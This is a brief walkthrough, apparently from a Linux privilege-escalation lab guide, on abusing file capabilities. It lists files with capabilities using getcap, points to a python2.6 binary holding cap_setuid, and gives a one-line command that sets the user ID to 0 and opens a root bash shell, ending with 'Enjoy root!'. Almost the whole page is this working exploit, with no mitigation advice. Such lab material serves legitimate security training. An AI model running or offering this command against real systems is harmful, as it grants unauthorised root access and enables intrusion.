Capabilities

Detection

Linux VM

1. In command prompt type: getcap -r / 2>/dev/null

2. From the output, notice the value of the “cap_setuid” capability.

Exploitation

Linux VM

1. In command prompt type:

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

2. Enjoy root!

Last updated 1 year ago